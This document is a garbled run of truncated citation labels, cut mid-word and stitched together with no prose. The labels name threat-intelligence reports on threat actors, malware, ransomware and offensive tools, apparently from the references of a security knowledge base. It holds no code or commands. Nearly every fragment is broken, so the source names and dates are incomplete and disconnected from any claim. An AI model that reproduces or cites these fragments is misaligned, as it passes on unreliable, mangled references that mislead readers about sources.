andiant Cutting Edge January 2024),(Citation: Novetta Blockbuster RATs),(Citation: Novetta Blockbuster),(Citation: Kaspersky ProjectSauro
Korean FSI TA505 2020),(Citation: Talos Konni May 2017),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Talos ROKRAT),(Citation: Unit

ation: TrendMicro EarthLusca 2022),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: Microsoft HAFNIUM March 2020

on: Cybereason Soft Cell June 2019),(Citation: sqlmap Introduction),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: ESET
KBALL Jun 2019),(Citation: Cylance Shaheen Nov 2018),(Citation: Cisco Group 72),(Citation: Proofpoint TA459 April 2017),(Citation: Securel

tation: GitHub PoshC2),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Profero APT27 December 2020),(Citation: TrendMicro Tonto
2),(Citation: TrendMicro EarthLusca 2022),(Citation: Kaspersky Flame Functionality),(Citation: Secureworks Emotet Nov 2018),(Citation: Tre
ks BRONZE UNION June 2017),(Citation: ANSSI Sandworm January 2021),(Citation: FireEye TRITON 2019),(Citation: FoxIT Wocao December
on April 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Unit 42 QUADAGENT July 2018),(Cit
February 2011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Kaspersky Lab SynAck May 2018),(Citation: ESET Industroyer),(C
21),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Unit 42 TA551 Jan 2021),

Citation: Symantec Calisto July 2018),(Citation: CoinTicker 2019),(Citation: Trend Micro IXESHE 2012),(Citation: ESET Okrum July 2019),(Cit

at Check Logs October 2023),(Citation: Unit 42 Gamaredon February 2022),(Citation: FireEye Operation Double Tap),(Citation: Carbon Blac

M August 2019),(Citation: Nccgroup Emissary Panda May 2018),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: APT15 Intezer Jun
rs Feb 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: Red Canary Dridex Threat Report 2021),(Citation: FireEye Clandestine Fox Part
ne 2013),(Citation: US-CERT BADCALL),(Citation: Securelist Kimsuky Sept 2013),(Citation: FireEye APT30),(Citation: PaloAlto NanoCore Feb 2
ean FSI TA505 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: US-CERT SHARPKNOT June 2018),(Citation: IBM MegaCortex),(C

Wizard March 2022),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: SentinelOne Agrius 2021),(Citation: Cybereason Kimsuky Novem

016),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Microsoft BlackCat Jun 2022),(Citation: Mandiant_UNC2165),(Citation: Unit 42 Luc
),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: ESET Operation Groundbait),(Citation: Checkpoint MosesStaff Nov 2021

pe March 2018),(Citation: McAfee Shamoon December 2018),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: ESET Attor

: Unit 42 Valak July 2020),(Citation: CISA SoreFang July 2016),(Citation: Riskiq Remcos Jan 2018),(Citation: NCSC APT29 July 2020),(Citation
ANDS May 2021),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Sophos Maze VM September 2020),(Citation: Ensi

nual),(Citation: Trend Micro Qakbot December 2020),(Citation: Securelist Kimsuky Sept 2013),(Citation: Kaspersky Transparent Tribe Augu

otected View),(Citation: Microsoft Process Wide Com Keys)

,(Citation: Bromium Ursnif Mar 2017),(Citation: Microsoft COM ACL),(Citation: Microsoft Protected View),(Citation: Microsoft System Wide
e Sharpshooter December 2018),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Talos PoetRAT April 2020),(Citation: Microsoft DDE Adv
tes Wi-Fi Spreader),(Citation: Rostovcev APT41 2021),(Citation: ESET Hermetic Wizard March 2022),(Citation: Microsoft BlackCat Jun 2022

uary 2022 ),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Ensilo Darkgate 2018),(Citation: Symantec RAINDROP January 2021

m June 2020),(Citation: Mandiant APT41),(Citation: ESET Machete July 2019),(Citation: ESET ComRAT May 2020),(Citation: Talos Frankens
end Micro IXESHE 2012),(Citation: CrowdStrike Ryuk January 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Cybersecurity Advis

dinokibi July 2019),(Citation: FireEye APT30),(Citation: FOX-IT May 2016 Mofang),(Citation: Secureworks DarkTortilla Aug 2022),(Citation:

kpoint MosesStaff Nov 2021),(Citation: wardle evilquest partii),(Citation: Bitdefender APT28 Dec 2015),(Citation: Kersten Akira 2023),(Cita

on: BlackBerry CostaRicto November 2020),(Citation: Cisco Talos Avos Jun 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citati
Github September 2018),(Citation: ESET Bad Rabbit),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Talos Olympic Destroyer 20
ation: GitHub Responder),
itation: ESET Turla Lunar toolset May 2024),(Citation: Mandiant APT41),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: M
Grupo TrickBot June 2017),(Citation: ESET RTM Feb 2017),(Citation: US-CERT Bankshot Dec 2017),(Citation: Bitdefender Sardonic Aug 2021
t 2015),(Citation: Microsoft Disable NTLM Nov 2012),(Citation: Microsoft Protected Users Security Group),(Citation: Microsoft WDigest Mi

(Citation: US-CERT TA18-074A),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: GitHub Pupy),(Citation: GitH
5 ProxyShell March 2022),(Citation: Microsoft Volt Typhoon May 2023),(Citation: emotet_hc3_nov2023),(Citation: Volexity Exchange Mara
41 2021),(Citation: Core Security Impacket),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: US-CERT TA18-074A),(C

bereason OperationCuckooBees May 2022),(Citation: cobaltstrike manual),(Citation: Rostovcev APT41 2021),(Citation: Symantec Daggerfly
pril 2016),(Citation: Sandfly BPFDoor 2022),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: ANSSI Sandworm January 2021
on: Proofpoint Leviathan Oct 2017),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Talos Bisonal Mar 2020),(Citation: BlackBe
ne 2019),(Citation: Unit 42 CARROTBAT November 2018),(Citation: Cyberint Qakbot May 2021),(Citation: Microsoft Actinium February 202

diant ROADSWEEP August 2022),(Citation: emotet_hc3_nov2023),(Citation: TrendMicro Netwalker May 2020),(Citation: win10_asr)
022 ),(Citation: MSTIC FoggyWeb September 2021),(Citation: ESET Operation Groundbait),(Citation: S2 Grupo TrickBot June 2017),(Citation
CuckooBees May 2022),(Citation: Unit 42 QUADAGENT July 2018),(Citation: ESET TeleBots Oct 2018),(Citation: Prevailion DarkWatchman 2

siMole June 2020),

ry NETWIRE January 2020),(Citation: Infoblox Lokibot January 2019),(Citation: Mandiant No Easy Breach),(Citation: Check Point APT31 Feb
20),(Citation: Unit 42 TA551 Jan 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: CheckPoint Bandook Nov 2020),(Citation

18),(Citation: Talos Kimsuky Nov 2021),(Citation: Cisco Operation Layover September 2021),(Citation: Symantec Thrip June 2018),(Citation

Citation: Cybereason OperationCuckooBees May 2022),(Citation: Kaspersky MoleRATs April 2019),(Citation: Cisco Talos Intelligence Group
wdStrike StellarParticle January 2022),(Citation: Microsoft BlackCat Jun 2022),(Citation: Mandiant FIN7 Apr 2022),(Citation: Cobalt Strike M
Strike Manual 4.3 November 2020),(Citation: CrowdStrike BloodHound April 2018),(Citation: Kaspersky Turla Aug 2014),(Citation: Kaspers

ctments March 2018),(Citation: KISA Operation Muzabi),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET Zebrocy May 2019),(Citati

ation: Trend Micro IXESHE 2012),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Kasp
May 2016 Mofang),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: Crow

aJakiro 2021 netlab360 analysis),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET Gelsemium J
e Sec Trickbot),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Red Canary NETWIRE January 2020),(Citation: DFIR Conti Bazar Nov 2021

ET Turla Mosquito May 2018),(Citation: Github Rapid7 Meterpreter Elevate),(Citation: ESET Sednit Part 3),(Citation: IBM TA505 April 2020

reEye NETWIRE March 2019),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Palo Alto Networks BBSRAT),(Citation: OilRig New Del

19),(Citation: FRP GitHub),(Citation: CISA GRU29155 2024),(Citation: Cyware Ngrok May 2019),(Citation: Mandiant Cutting Edge Part 2 Jan
(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: Check Point Pay2Key November 2020),(Citation: GitHub Quasar

tober 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: Kaspersky QakBot September 2021),(Citation: Novetta Winnti April 2015),(Citati
ation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Talos TinyTurla September 2021),(Citation: Novetta-Axiom),(Cit
mber 2020),(Citation: synack 2016 review),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: objsee mac malw
2011),(Citation: Kaspersky WIRTE November 2021),(Citation: ESET Carbon Mar 2017),(Citation: FireEye SUNBURST Backdoor December 202
n: PowerSploit Documentation),(Citation: Elastic Pikabot 2024),(Citation: RecordedFuture WhisperGate Jan 2022),(Citation: MDSec Brute R
: Dell Dridex Oct 2015),(Citation: SentinelOne INC Ransomware),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Cisco Talos Intelligen
Eye Know Your Enemy FIN8 Aug 2016),(Citation: Volexity Patchwork June 2018),(Citation: FireEye FIN10 June 2017),(Citation: Volexity Ivan
(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: PsE
Securelist GCMAN),(Citation: PWC Cloud Hopper April 2017),(Citation: Crowdstrike HuntReport 2022),(Citation: Apple Unified Log Analysis

a January 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET ComRAT May 2020),(Citation: Cybereason Cobalt Kitty 2017),(Cit
icro Ursnif Mar 2015),(Citation: RedCanary RaspberryRobin 2022),(Citation: Forcepoint Monsoon),(Citation: Nicolas Falliere, Liam O Murch

blic Tools),(Citation: Kaspersky Winnti April 2013),(Citation: FireEye APT41 Aug 2019),(Citation: Trend Micro TeamTNT),(Citation: ClearSky

18),(Citation: Unit 42 OilRig Sept 2018),(Citation: FireEye Operation Double Tap),(Citation: Carbon Black HotCroissant April 2020),(Citation:

acy Dec 2018),(Citation: BiZone Lizar May 2021),(Citation: Korean FSI TA505 2020),(Citation: Talos Konni May 2017),(Citation: McAfee Netw
tion: Secureworks BRONZE SILHOUETTE May 2023),(Citation: CISA GRU29155 2024),(Citation: Volexity Ivanti Zero-Day Exploitation January

os Crashoverride 2017),(Citation: CrowdStrike Ryuk January 2019),(Citation: Arxiv Avaddon Feb 2021),(Citation: Trend Micro Ransomware
alem Bumblebee April 2022),

e Jun 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: Checkpoint Dridex Jan 2021),(Citation: ANSSI Sandworm January 2021),(Citation
's Return October 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Kaspersky Flame),(Citation: Talos Zeus Panda Nov 2017),(C

ration Spalax Jan 2021),(Citation: Mandiant FIN7 Apr 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Mandiant APT43 March 2024),(C

tion: Token tactics),(Citation: Evilginx 2 July 2018)

n: Checkpoint MosesStaff Nov 2021),(Citation: ESET RTM Feb 2017),(Citation: Wired Lockergoga 2019),(Citation: ATT QakBot April 2021),(C

022),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: Secureworks REvil September 2019),(Citation: FireEye APT41 Aug 2019),(Ci
azyScripter Feb 2021),(Citation: Cybereason Oceanlotus May 2017),(Citation: Securelist MuddyWater Oct 2018),(Citation: Unit42 Xbash Sep
tion: Zscaler APT31 Covid-19 October 2020),(Citation: Korean FSI TA505 2020),(Citation: Trendmicro_IcedID),(Citation: Cybereason Chaes N

ation: Fidelis INOCNATION),(Citation: ATT QakBot April 2021),(Citation: Cybereason Valak May 2020),(Citation: Security Intelligence More
MuddyWater Oct 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Secure List Bad Rabbit),(Citation: DFIR Report APT35 ProxyShell M

Trooper May 2020),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Mandiant APT41),(Citation: Securelist BlackEnergy Nov 2014),(C

ation: Microsoft NICKEL December 2021),(Citation: FireEye FiveHands April 2021),(Citation: Mcafee Clop Aug 2019),(Citation: trendmicro x
MosesStaff Nov 2021),(Citation: Palo Alto OilRig Oct 2016),(Citation: Group IB APT 41 June 2021),(Citation: Microsoft PLATINUM April 2016
tion: DFIR Phosphorus November 2021),(Citation: Lunghi Iron Tiger Linux),(Citation: NKAbuse SL),(Citation: Microsoft NICKEL December 20

: DFIR Report APT35 ProxyShell March 2022),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: PWC Cloud Hopper April 2017),(Ci
Aug 2019),(Citation: FireEye FIN10 June 2017),(Citation: ANSSI Sandworm January 2021),(Citation: Trend Micro IXESHE 2012),(Citation: Man

t June 2017),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Microsoft PLATINUM April 2016),(Citation: Trend Micro IXESHE 2012),(Ci

ools),(Citation: SecureList Silence Nov 2017),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Mandiant FIN12 Oct 2021),(Citation: Group I
st 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Wired Lockergoga 2019),
m O Murchu, Eric Chien February 2011),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Cylance Shaheen Nov 2018),(Cit

Water Dec 2018),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Symantec Buckeye),(Citation: Cisco Talos Intelligence Group),(Citation

on: cisco_deploy_rsa_keys)
n: GitHub IAD Secure Host Baseline UAC Filtering)

FIN8 Aug 2016),(Citation: Microsoft PLATINUM April 2016),(Citation: Trend Micro IXESHE 2012),(Citation: TrendMicro Trickbot Feb 2019),(C

tion Spalax Jan 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Secureworks IRON RITUA
per April 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Arctic Wolf Akira 2023),(Citation: DarkReading FireEye F

on: CrowdStrike StellarParticle January 2022),(Citation: Microsoft POLONIUM June 2022),(Citation: CobaltStrike Daddy May 2017),(Citation
tation: Microsoft Remote Use of Local),(Citation: TechNet Credential Theft)
t 2014),(Citation: Github PowerShell Empire),(Citation: Volexity Patchwork June 2018),(Citation: DigiTrust NanoCore Jan 2017),(Citation: G
2017),(Citation: FireEye Hancitor),(Citation: ESET Carberp March 2012),(Citation: Check Point Black Basta October 2022),(Citation: Unit42 R
gate 2018),(Citation: ESET Attor Oct 2019),(Citation: Elastic Latrodectus May 2024),(Citation: ClearSky Siamesekitten August 2021),(Citatio
m July 2019),(Citation: Cybereason StrifeWater Feb 2022),(Citation: ClearSky Lazarus Aug 2020),(Citation: Proofpoint Bumblebee April 2022

2022),(Citation: Palo Alto Latrodectus Activity June 2024),(Citation: Cybereason Molerats Dec 2020),(Citation: ESET Crutch December 202
carCruft May 2019),(Citation: Anomali Static Kitten February 2021),(Citation: Mandiant APT1 Appendix),(Citation: Meyers Numbered Pand

2018),(Citation: Microsoft 365 Defender Solorigate),(Citation: Github AD-Pentest-Script),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation
une 2021),(Citation: Rancor Unit42 June 2018),(Citation: ESET PipeMon May 2020),(Citation: Eset Ramsay May 2020),(Citation: cobaltstrike

er March 2022),(Citation: Microsoft runas),(Citation: Microsoft Create Token),(Citation: Microsoft Replace Process Token)

te Token),(Citation: Microsoft Replace Process Token)

ust 2022),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Microsoft Net),(Citation: Mandiant FIN12 Oct 2021),(Citation:

NZE UNION June 2017),(Citation: Github PowerShell Empire),(Citation: ClearSky Siamesekitten August 2021),(Citation: ANSSI Sandworm Ja

(Citation: ThreatConnect Kimsuky September 2020),(Citation: Proofpoint TA2541 February 2022),(Citation: Bitdefender FunnyDream Cam

PR 2024),(Citation: FireEye APT29),(Citation: FireEye APT17),(Citation: Proofpoint TA450 Phishing March 2024),(Citation: Check Point APT3
tation: FireEye APT34 July 2019),(Citation: GitHub Sliver C2 DNS),(Citation: Ensilo Darkgate 2018),(Citation: Group IB APT 41 June 2021),(Ci

Citation: ESET Sednit Part 2),(Citation: Unit42 Sofacy Dec 2018),(Citation: ESET Zebrocy May 2019),(Citation: CISA AA20-301A Kimsuky),(Ci

n: Proofpoint TA505 October 2019),(Citation: IBM Grandoreiro April 2020),(Citation: ESET Zebrocy Nov 2018),(Citation: Secureworks Gand
Novetta Blockbuster),(Citation: Carbon Black HotCroissant April 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: SecureWorks
thub PowerShell Empire),(Citation: GitHub Bloodhound),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: McAfee Gold D
Blockbuster RATs),(Citation: BlackBerry CostaRicto November 2020),(Citation: Novetta Blockbuster),(Citation: ESET Sednit Part 2),(Citation:

nuary 2021),(Citation: ESET Nomadic Octopus 2018),(Citation: Cybereason Soft Cell June 2019),(Citation: FireEye APT35 2018),(Citation: M
Machete Aug 2014),(Citation: 360 Machete Sep 2020),(Citation: GitHub Pupy),(Citation: Fortinet Remcos Feb 2017),(Citation: PowerSploit D
),(Citation: CERT-UA WinterVivern 2023),(Citation: ESET LightNeuron May 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: Ensilo Darkga
2014),(Citation: group-ib_redcurl1),(Citation: Sekoia Raccoon1 2022),(Citation: Palo Alto Rover),(Citation: Talos Promethium June 2020),

T 41 June 2021),(Citation: DustySky),(Citation: US-CERT Emotet Jul 2018),(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye Know

Cylance Dust Storm),(Citation: FireEye APT39 Jan 2019),(Citation: ESET Gazer Aug 2017),(Citation: Cybereason Astaroth Feb 2019),(Citatio

AA20-296A Berserk Bear December 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Kroll Qakbot June 2020),(Citation: Micros
ation: NIST 800-63-3)

Citation: Unit 42 VERMIN Jan 2018),(Citation: Symantec Daggerfly 2023),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Securelist

Citation: FBI FLASH APT39 September 2020),(Citation: Mandiant Cutting Edge January 2024),(Citation: Crowdstrike DNC June 2016),(Citatio

,(Citation: ESET Turla Mosquito Jan 2018),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Rewterz Sidewinder COVI

ten Akira 2023),(Citation: FireEye NETWIRE March 2019),(Citation: FireEye FIN7 March 2017),(Citation: FireEye Know Your Enemy FIN8 Au
b SILENTTRINITY March 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: FBI FLASH APT39 September 2020),(Citation: KISA Operatio
ation: Unit 42 Kazuar May 2017),(Citation: Trend Micro Skidmap),(Citation: Fysbis Palo Alto Analysis),(Citation: Mandiant Cutting Edge Janu
ation: Proofpoint TA2541 February 2022),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro Qakbot December 2020),(Citation: T
ersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Unit 42 Kazuar May 2017),(Citation: Trend Micro Daserf Nov 2017),(Ci

,(Citation: Mandiant Pulse Secure Update May 2021),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Aug 2019),(Citation: DFIR Rep
n: piazza launch agent mitigation)

itation: FireEye APT41 Aug 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Lazarus Nov 2
The Dukes),(Citation: CopyKittens Nov 2015),(Citation: Talos Manjusaka 2022),(Citation: Rostovcev APT41 2021),(Citation: Visa FIN6 Feb 20

(Citation: NCSC Joint Report Public Tools),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: IBM IcedID November 2

t Indictment GRU Unit 74455 October 2020),(Citation: Microsoft SDelete July 2016),(Citation: Dragos Crashoverride 2017),(Citation: Unit 4

otus 2017),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation:
tation: FireEye APT41 Aug 2019),(Citation: Cybereason INC Ransomware November 2023),(Citation: Secure List Bad Rabbit),(Citation: FireE

t May 2024),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),(Citation: ESET Nomadic Octopus 2018),(Citation: Cyb

20),(Citation: Group IB APT 41 June 2021),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Trend Micro IXESHE 2012),(Citatio

tation: CheckPoint Naikon May 2020),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: ESET Gamaredon June 2020),(Citation: CheckPoi
2021 netlab360 analysis),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: Microsoft Actinium Febr

ation Muzabi),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Mandiant FIN1

an Government Attacks September 2022),(Citation: IBM ZeroCleare Wiper December 2019),(Citation: FireEye Shamoon Nov 2016),(Citatio
2),(Citation: CrowdStrike BloodHound April 2018),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FIN8 July 2021),(Cita

erVivern 2023),(Citation: Security Affairs Elderwood Sept 2012),(Citation: Microsoft PLATINUM April 2016),(Citation: ESET EvasivePanda 20

n May 2020),(Citation: Cybereason Astaroth Feb 2019),(Citation: Talos CCleanup 2017),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Cis

December 2021),(Citation: NCC Group APT15 Alive and Strong),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant A

tion: Talos Promethium June 2020),(Citation: Securelist WhiteBear Aug 2017),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Man
Wasp Map 2019),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Recorde

persky ThreatNeedle Feb 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Star Blizzard August 2022),
INITY Modules July 2019),(Citation: FireEye WMI 2015),(Citation: win10_asr)

ation: Kaspersky ProjectSauron Full Report),(Citation: Symantec Thrip June 2018),(Citation: DFIR Ryuk's Return October 2020),(Citation: U
Talos ROKRAT),(Citation: Unit 42 Valak July 2020),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: Latrodectus AP

crosoft HAFNIUM March 2020),(Citation: Mandiant_UNC2165),(Citation: Talos Kimsuky Nov 2021),(Citation: Zscaler APT31 Covid-19 Octob

TTE May 2023),(Citation: ESET WinterVivern 2023),(Citation: Microsoft Log4j Vulnerability Exploitation December 2021),(Citation: Volexity
9 April 2017),(Citation: Securelist Sofacy Feb 2018),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Talos Frankenstein June 2019

0),(Citation: TrendMicro Tonto Team October 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Microsoft SIR Vol 21),(C
motet Nov 2018),(Citation: TrendMicro Tonto Team October 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: FireEye APT28 Hospitalit
ation: FoxIT Wocao December 2019),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Cybersecurity Advisory GRU Brute
42 QUADAGENT July 2018),(Citation: Baumgartner Naikon 2015),(Citation: Unit 42 Kazuar May 2017),(Citation: Securelist MiniDuke Feb 20
(Citation: ESET Industroyer),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Proofpoint TA50
on: ESET Okrum July 2019),(Citation: Radware Micropsia July 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citatio

ble Tap),(Citation: Carbon Black HotCroissant April 2020),(Citation: PTSecurity Higaisa 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: T

1),(Citation: APT15 Intezer June 2018),(Citation: FinFisher Citation),(Citation: NCC Group WastedLocker June 2020),(Citation: PowerSploit D
n: FireEye Clandestine Fox Part 2),(Citation: Securelist LuckyMouse June 2018),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Ci
ation: PaloAlto NanoCore Feb 2016),(Citation: Novetta Blockbuster),(Citation: TechNet Netsh),(Citation: US-CERT TA18-074A),(Citation: Zsc
,(Citation: IBM MegaCortex),(Citation: ESET Turla PowerShell May 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: H

: Cybereason Kimsuky November 2020),(Citation: F-Secure BlackEnergy 2014),(Citation: McAfee Sharpshooter December 2018),(Citation: M

NC2165),(Citation: Unit 42 Lucifer June 2020),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: US-CERT TA18-074A),
eckpoint MosesStaff Nov 2021),(Citation: ESET Sednit Part 1),(Citation: Medium Metamorfo Apr 2020),(Citation: Mandiant APT1 Appendix)

ary 2024),(Citation: ESET Attor Oct 2019),(Citation: ESET Gelsemium June 2021),(Citation: Github PowerShell Empire),(Citation: Sandfly BPF

CSC APT29 July 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Securelist WhiteBear Aug 2017),(Citation: ESET Industroye
ptember 2020),(Citation: Ensilo Darkgate 2018),(Citation: Mandiant FIN12 Oct 2021),(Citation: Kersten Akira 2023),(Citation: Palo Alto Uni

persky Transparent Tribe August 2020),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Mandiant FIN13 Aug 2022),(Citation: Securework

tation: Microsoft System Wide Com Keys),(Citation: Microsoft Process Wide Com Keys)
),(Citation: Microsoft DDE Advisory Nov 2017),(Citation: Enigma Reviving DDE Jan 2018),(Citation: Microsoft ASR Nov 2017),(Citation: Micr
: Microsoft BlackCat Jun 2022),(Citation: Cisco Talos Avos Jun 2022),(Citation: Unit 42 Lucifer June 2020),(Citation: SentinelOne Aoqin Drag

antec RAINDROP January 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Eset Ramsay May 2020),(Citation: Cisco Talos Int

020),(Citation: Talos Frankenstein June 2019),(Citation: Unit42 RDAT July 2020),(Citation: Sophos Maze VM September 2020),(Citation: Tre
,(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Recorded Future REDDELTA July 2020),(Citation: Proofp

rkTortilla Aug 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Korean FSI TA505 2020),(Citation: NCC Group WastedLocker June 2020),(

tion: Kersten Akira 2023),(Citation: FireEye NETWIRE March 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: CrowdStrike Ryuk Ja

ual 4.3 November 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: CISA AA20-259A Iran
n: Talos Olympic Destroyer 2018),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: FireEye Periscope March 2018),(Citation: Cob

AT December 2018),(Citation: Mythc Documentation),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Gelsemium June 2021),(Ci
Bitdefender Sardonic Aug 2021),(Citation: ESET BlackEnergy Jan 2016),(Citation: CISA GRU29155 2024),(Citation: Securelist DarkVishnya De
itation: Microsoft WDigest Mit),(Citation: TechNet Credential Guard),(Citation: Microsoft Replication ACL),(Citation: win10_asr),(Citation: M

: GitHub Pupy),(Citation: GitHub Mimikatz lsadump Module),(Citation: NCSC Joint Report Public Tools),(Citation: TrueSec Gsecdump),(Cita
ation: Volexity Exchange Marauder March 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: FireEye APT35 2018),(Citation: FireE
tation: US-CERT TA18-074A),(Citation: MSTIC Octo Tempest Operations October 2023),(Citation: CISA AA24-038A PRC Critical Infrastructur

,(Citation: Symantec Daggerfly 2023),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Github AD-Pentest-Script),(Citation: US-C
ANSSI Sandworm January 2021),(Citation: FireEye Clandestine Wolf),(Citation: Recorded Future REDDELTA July 2020),(Citation: ClearSky La
al Mar 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET Sednit Part
crosoft Actinium February 2022),(Citation: Github PowerShell Empire),(Citation: Prevailion DarkWatchman 2021),(Citation: Talos PoetRAT

20),(Citation: win10_asr)
o TrickBot June 2017),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Bitdefender
n: Prevailion DarkWatchman 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Cylance Sodinokibi July 2019),(Citation: Symantec Vo

tation: Check Point APT31 February 2021),(Citation: Cylance Dust Storm),(Citation: Cisco H1N1 Part 1),(Citation: Trend Micro TeamTNT),(C
t Bandook Nov 2020),(Citation: CISA AA21-200A APT40 July 2021),

ntec Thrip June 2018),(Citation: Cybereason Oceanlotus May 2017),(Citation: DFIR Conti Bazar Nov 2021),(Citation: NCSC Joint Report Publ

Cisco Talos Intelligence Group),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Fidelis njRAT June 2013),(Citation
2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CrowdStrike BloodHound April 2018),(Citation: TechNet Dsquery),(Cita
a Aug 2014),(Citation: Kaspersky QakBot September 2021),(Citation: Korean FSI TA505 2020),(Citation: Proofpoint TA505 Mar 2018),(Citati

